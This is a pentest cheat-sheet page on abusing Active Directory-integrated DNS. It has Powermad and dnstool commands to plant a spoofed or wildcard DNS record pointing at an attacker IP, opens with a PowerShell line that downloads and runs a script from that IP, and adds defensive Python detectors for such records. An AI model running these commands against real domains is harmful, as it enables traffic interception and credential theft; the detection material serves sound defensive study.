# ADIDNS Abuse

0\. Load tools:

```
PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1")
```

1\. Check if you are able to modify (add) AD DNS names:

```
PS > Get-ADIDNSZone -Credential $cred -Verbose
DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
DC=_msdcs.megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=megacorp,DC=local

PS > Get-ADIDNSPermission -Credential $cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
Principal             : NT AUTHORITY\Authenticated Users
IdentityReference     : S-1-5-11
ActiveDirectoryRights : CreateChild
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
```

This `CreateChild` permission is what we need.

2\. Create a new DNS node for a name that is likely to be looked up (and so can be spoofed), point it at the attacker's IP and enable it. I chose `pc01`, which was found in the DNS cache:

```
PS > New-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
PS > $dnsRecord = New-DNSRecordArray -Type A -Data 10.10.13.37
PS > Set-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Value $dnsRecord -Credential $cred -Verbose
PS > Enable-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
```

3\. Check the newly created DNS object and try to resolve it. AD will need some time (\~180 seconds) to sync the LDAP changes via its DNS dynamic update protocol, so the name may not resolve right away:

```
PS > Get-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Credential $cred -Verbose
PS > Resolve-DNSName pc01
PS > cmd /c ping -n 1 pc01
```

4\. Clean up:

```
PS > Remove-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
```
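Steps 1 to 4 above create and delete a `dnsNode` object over LDAP. On the defender's side that creation is visible as Windows Security event 5137 ("A directory service object was created"), provided the "Audit Directory Service Changes" subcategory is enabled and the MicrosoftDNS containers carry an audit entry for object creation. The script below is an added example (not code from this page, from Powermad or from any other project) that parses 5137 message text and flags `dnsNode` creations that were not made by a machine account, plus any node named `*` or `wpad`. The event texts are constructed samples, the `ALLOWED_CREATORS` allowlist is a placeholder to tune per environment, and the rule that legitimate records are written by the DNS server's machine account is an assumption stated in the code.

```python
#!/usr/bin/env python3
"""Flag dnsNode creations in Windows Security event 5137 ("A directory service object was created").
The event texts below are constructed samples, not real log exports."""
import re

# Assumed allowlist of non-machine principals that legitimately create nodes (tune per environment)
ALLOWED_CREATORS = {"MEGACORP\\svc-dhcp"}
SENSITIVE_NODES = {"*", "wpad"}
FIELD_PATTERNS = {
    "account": r"^\s*Account Name:\s*(\S.*?)\s*$",
    "domain": r"^\s*Account Domain:\s*(\S.*?)\s*$",
    "dn": r"^\s*DN:\s*(\S.*?)\s*$",
    "cls": r"^\s*Class:\s*(\S.*?)\s*$",
}

def parse_5137(text):
    """Pull the subject and object fields out of one 5137 event message."""
    fields = {}
    for key, pattern in FIELD_PATTERNS.items():
        m = re.search(pattern, text, re.MULTILINE)
        fields[key] = m.group(1) if m else None
    return fields

def dns_node_from_dn(dn):
    """'DC=<node>,DC=<zone>,CN=MicrosoftDNS,...' -> (node, zone); None for non-ADIDNS objects."""
    parts = dn.split(",")
    if len(parts) < 3 or parts[2].strip().upper() != "CN=MICROSOFTDNS":
        return None
    return parts[0].split("=", 1)[1], parts[1].split("=", 1)[1]

def evaluate(event, allowed=ALLOWED_CREATORS):
    """Return the reasons a creation deserves a look (empty list = looks benign)."""
    if event.get("cls") != "dnsNode" or not event.get("dn"):
        return []
    located = dns_node_from_dn(event["dn"])
    if located is None:
        return []
    node, zone = located
    creator = f"{event['domain']}\\{event['account']}"
    reasons = []
    # Assumption: records registered through dynamic update are written by the DNS server's
    # machine account, so a user account creating dnsNode objects directly is unusual.
    if not event["account"].endswith("$") and creator not in allowed:
        reasons.append(f"{creator} created dnsNode {node}.{zone} directly over LDAP")
    if node.lower() in SENSITIVE_NODES:
        reasons.append(f"node name '{node}' is a wildcard/wpad name (ADIDNS wildcard injection)")
    return reasons

def scan(events):
    """Evaluate a batch of 5137 messages; returns (creator, dn, reasons) for each flagged one."""
    hits = []
    for text in events:
        ev = parse_5137(text)
        reasons = evaluate(ev)
        if reasons:
            hits.append((f"{ev['domain']}\\{ev['account']}", ev["dn"], reasons))
    return hits

def sample_event(account, domain, node, cls="dnsNode"):
    """Constructed 5137 message in the layout the Security log renders it."""
    return f"""A directory service object was created.

Subject:
\tSecurity ID:\t\t{domain}\\{account}
\tAccount Name:\t\t{account}
\tAccount Domain:\t\t{domain}
\tLogon ID:\t\t0x3E7

Directory Service:
\tName:\tmegacorp.local
\tType:\tActive Directory Domain Services

Object:
\tDN:\tDC={node},DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
\tGUID:\t{{00000000-0000-0000-0000-000000000000}}
\tClass:\t{cls}

Operation:
\tCorrelation ID:\t{{00000000-0000-0000-0000-000000000000}}
\tApplication Correlation ID:\t-
"""

SAMPLE_EVENTS = [
    sample_event("DC01$", "MEGACORP", "ws42"),       # benign: written by the DNS server (DC) itself
    sample_event("snovvcrash", "MEGACORP", "pc01"),  # the New-ADIDNSNode step from this page
    sample_event("snovvcrash", "MEGACORP", "*"),     # wildcard injection
]

if __name__ == "__main__":
    for creator, dn, reasons in scan(SAMPLE_EVENTS):
        print(f"[!] {creator} -> {dn}")
        for r in reasons:
            print(f"    - {r}")
```

Feed it the message text of 5137 events exported from the DC (or from a SIEM). The 5141 event (object deleted) fired by step 4 can be matched the same way to catch the clean-up of a short-lived record.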

## ADIDNS Poisoning (Wildcard Injection)

* <https://blog.netspi.com/exploiting-adidns/>
* <https://blog.netspi.com/adidns-revisited/>
* <https://www.gosecure.net/blog/2019/02/20/abusing-unsafe-defaults-in-active-directory/>

Check if we can perform the attack:

```
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r '*' --action query DC01.megacorp.local
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r 'wpad' --action query DC01.megacorp.local
```

## Tools

### adidnsdump

* <https://github.com/dirkjanm/adidnsdump>

```
$ adidnsdump -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.megacorp.local -r [--dcfilter]
$ mv records.csv ~/ws/enum/adidns.csv
```

Check with ldapsearch:

```
$ ldapsearch -H ldap://10.10.13.37:389 -x -D 'CN=snovvcrash,CN=Users,DC=megacorp,DC=local' -w 'Passw0rd!' -s sub -b 'DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local' '(objectClass=*)' dnsRecord dNSTombstoned name
```
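The `dnsRecord` values that ldapsearch prints are base64 blobs in the `DNS_RPC_RECORD` layout that adidnsdump and dnstool decode for you. The following added example (not code from this page, from adidnsdump or from dnstool) parses that LDIF output directly, so you can see what a node actually holds (type, TTL, static or timestamped, decoded data), and it reports whether the `*` and `wpad` nodes from the wildcard injection section above exist and whether they are live or tombstoned. The LDIF is constructed inside the script with the zone base DN used in the ldapsearch command above; the record blobs are packed by the script's own `build_dns_record`, so none of it comes from a real domain.

```python
"""Decode dnsRecord blobs from ldapsearch LDIF output and flag wildcard/wpad nodes (constructed LDIF)."""
import base64, ipaddress, struct
from datetime import datetime, timezone

# DNS_RPC_RECORD (MS-DNSP 2.3.2.2): DataLength(2) Type(2) Version(1) Rank(1) Flags(2) Serial(4)
# little-endian; TtlSeconds(4) big-endian; Reserved(4); TimeStamp(4) little-endian (0 = static)
HEADER = struct.Struct("<HHBBHI")
TYPE_NAMES = {0: "ZERO", 1: "A", 2: "NS", 5: "CNAME", 12: "PTR"}
FILETIME_EPOCH_DIFF = 116444736000000000  # 100 ns ticks from 1601-01-01 to 1970-01-01
SENSITIVE_NODES = {"*", "wpad"}           # names that should exist only if deliberately reserved

def parse_count_name(data):
    """DNS_COUNT_NAME: Length(1) LabelCount(1), then length-prefixed labels ending in 0x00."""
    labels, pos = [], 2
    for _ in range(data[1]):
        n = data[pos]
        labels.append(data[pos + 1:pos + 1 + n].decode("utf-8", "replace"))
        pos += 1 + n
    return ".".join(labels) + "."

def parse_dns_record(blob):
    """Return header fields and a decoded Data value for one dnsRecord blob."""
    data_len, rtype, _version, rank, _flags, serial = HEADER.unpack_from(blob, 0)
    ttl = struct.unpack_from(">I", blob, 12)[0]
    timestamp = struct.unpack_from("<I", blob, 20)[0]
    data = blob[24:24 + data_len]
    if rtype == 1:
        value = str(ipaddress.IPv4Address(data))
    elif rtype in (2, 5, 12):
        value = parse_count_name(data)
    elif rtype == 0:  # tombstone: Data is the EntombedTime FILETIME
        ft = struct.unpack("<Q", data)[0]
        value = datetime.fromtimestamp((ft - FILETIME_EPOCH_DIFF) / 10_000_000, tz=timezone.utc)
    else:
        value = data.hex()  # types not decoded here are kept raw
    return {"type_name": TYPE_NAMES.get(rtype, str(rtype)), "rank": rank, "serial": serial,
            "ttl": ttl, "static": timestamp == 0, "data": value}

def parse_ldif(text):
    """Group ldapsearch output into entries; 'attr:: v' is base64, a leading space folds a line."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    entries, cur = [], None
    for line in lines + [""]:
        if not line.strip():  # blank line ends an entry; comment/summary blocks without a dn are dropped
            entries += [cur] if cur and "dn" in cur else []
            cur = None
            continue
        cur = cur or {"name": None, "tombstoned": False, "records": []}
        key, _, value = line.partition(":")
        value = base64.b64decode(value[1:].strip()) if value.startswith(":") else value.strip()
        if key == "dnsRecord":
            cur["records"].append(parse_dns_record(value))
        elif key == "dNSTombstoned":
            cur["tombstoned"] = value.upper() == "TRUE"
        elif key in ("dn", "name"):
            cur[key] = value
    return entries

def audit(entries):
    """List wildcard/wpad nodes with their live/tombstoned state and record types."""
    return [(e["name"], "tombstoned" if e["tombstoned"] else "live", [r["type_name"] for r in e["records"]])
            for e in entries if e["name"] in SENSITIVE_NODES]

# Constructed sample data: pack records the same way the DNS server stores them.
def build_dns_record(rtype, data, ttl=600, serial=1, rank=0xF0, timestamp=0):
    return (HEADER.pack(len(data), rtype, 5, rank, 0, serial) + struct.pack(">I", ttl)
            + struct.pack("<II", 0, timestamp) + data)

def build_count_name(fqdn):
    labels = [l.encode() for l in fqdn.rstrip(".").split(".")]
    raw = b"".join(bytes([len(l)]) + l for l in labels) + b"\x00"
    return bytes([len(raw), len(labels)]) + raw

def ldif_entry(name, blobs, tombstoned=False):
    lines = [f"dn: DC={name},DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local",
             f"name: {name}"] + (["dNSTombstoned: TRUE"] if tombstoned else [])
    for blob in blobs:  # fold long values like ldapsearch does: continuation lines start with a space
        text = "dnsRecord:: " + base64.b64encode(blob).decode()
        lines += [text[:40]] + [" " + text[i:i + 39] for i in range(40, len(text), 39)]
    return "\n".join(lines)

SAMPLE_LDIF = "# extended LDIF\n\n" + "\n\n".join([
    ldif_entry("pc01", [build_dns_record(1, bytes([10, 10, 13, 37]), serial=42)]),
    ldif_entry("files", [build_dns_record(5, build_count_name("dc01.megacorp.local"))]),
    ldif_entry("*", [build_dns_record(1, bytes([10, 10, 13, 37]), timestamp=3_000_000)]),
    ldif_entry("wpad", [build_dns_record(0, struct.pack("<Q", 1_700_000_000 * 10_000_000 + FILETIME_EPOCH_DIFF))],
               tombstoned=True),  # EntombedTime 2023-11-14T22:13:20Z
]) + "\n\nsearch: 2\nresult: 0 Success\n"

if __name__ == "__main__":
    for name, state, types in audit(parse_ldif(SAMPLE_LDIF)):
        print(f"[!] sensitive node '{name}' present ({state}, records {types})")
```

To use it on real output, read the ldapsearch result file and pass its text to `parse_ldif`. A `*` node with a live A record means the zone answers for every name that does not exist, which is exactly the condition the wildcard injection check above looks for, so a defender normally wants that node to exist only with an address they chose.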

If you need to dump the ADIDNS of a child domain (say `child.megacorp.local`), then you may want to use the `--zone` and `--forest` options:

```
# Will dump records from DC=megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local --zone megacorp.local --forest -r

# Will attempt to dump records from DC=child.megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=child,DC=megacorp,DC=local (and may fail)
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local -r
```

Merge all the IPs into `/24` CIDRs with a Python script:

{% code title="cidr\_merge.py" %}

```python
#!/usr/bin/env python3

"""
Merge standalone IPs into CIDRs.

Example:
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' > ip.lst
$ cidr_merge.py | sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n | grep -e '^192' -e '^172' -e '^10'
"""

import netaddr

iplst = []
with open('ip.lst', 'r') as fd:
    for line in fd:
        ip = line.rstrip('\n')
        try:
            # Widen every host address to its /24 so that hosts from the same subnet collapse into one network
            iplst.append(netaddr.IPNetwork(f'{ip}/24'))
        except netaddr.core.AddrFormatError:
            # Skip values that are not IP addresses (CSV header, hostnames, empty lines)
            pass

# cidr_merge() returns the smallest set of networks covering the input; adjacent /24s become larger blocks
for net in netaddr.cidr_merge(iplst):
    print(str(net))
```

{% endcode %}

Or using [mapcidr](https://github.com/projectdiscovery/mapcidr):

```
$ eget -qs linux/amd64 "projectdiscovery/mapcidr" --to mapcidr
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' | egrep '^[0-9]' | ./mapcidr -aa -silent | ./mapcidr -s -silent

$ cme ldap 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M get-network -o ALL=true
```

### DnsServer

Dump ADIDNS using PowerShell and the `DnsServer` module:

```
PS > Import-Module DnsServer
PS > Get-DnsServerZone -ComputerName DC01 | % {Get-DnsServerResourceRecord -ComputerName DC01 -ZoneName $_.ZoneName -RRType A} | ft -Wrap -AutoSize | tee adidns.txt
```
